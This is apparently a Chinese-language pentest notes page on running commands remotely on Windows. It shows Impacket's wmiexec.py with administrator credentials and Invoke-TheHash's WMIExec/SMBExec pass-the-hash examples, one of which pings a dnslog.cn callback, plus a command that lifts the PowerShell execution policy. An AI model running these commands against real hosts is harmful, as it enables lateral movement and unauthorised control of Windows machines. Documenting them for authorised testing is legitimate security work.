windows远程执行命令总结

1. 利用Impacket

Impacket是一个Python类库，用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP，ARP，IPv4，IPv6，SMB，MSRPC，NTLM，Kerberos，WMI，LDAP等协议进行低级编程访问。 

git clone https://github.com/CoreSecurity/impacket.git cd impacket/ python setup.py install

cd impacket/example

 以WMIC 做演示：

proxychains python wmiexec.py SERVER01/Administrator:password@10.x.x.x

2.Invoke-TheHash-master

Functions

• Invoke-WMIExec
• Invoke-SMBExec
• Invoke-SMBEnum
• Invoke-SMBClient
• Invoke-TheHash

Invoke-WMIExec

• WMI command execution function.

Example:

Invoke-WMIExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

Invoke-SMBExec

• SMB (PsExec) command execution function supporting SMB1, SMB2.1, with and without SMB signing.

Example:

Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

Example:

Check SMB signing requirements on target. Invoke-SMBExec -Target 192.168.100.20

Screenshot:

复现：

解决办法：

Set-ExecutionPolicy -ExecutionPolicy UNRESTRICTED

常用SMBEXec 做测试 

Invoke-SMBExec -Target 10.x.190.8 -Username Administrator -Hash efd2aec67e96c7264873c255c08c872f -Command "ping xx.dnslog.cn -n 2"

工具下载地址：https://github.com/Kevin-Robertson/Invoke-TheHash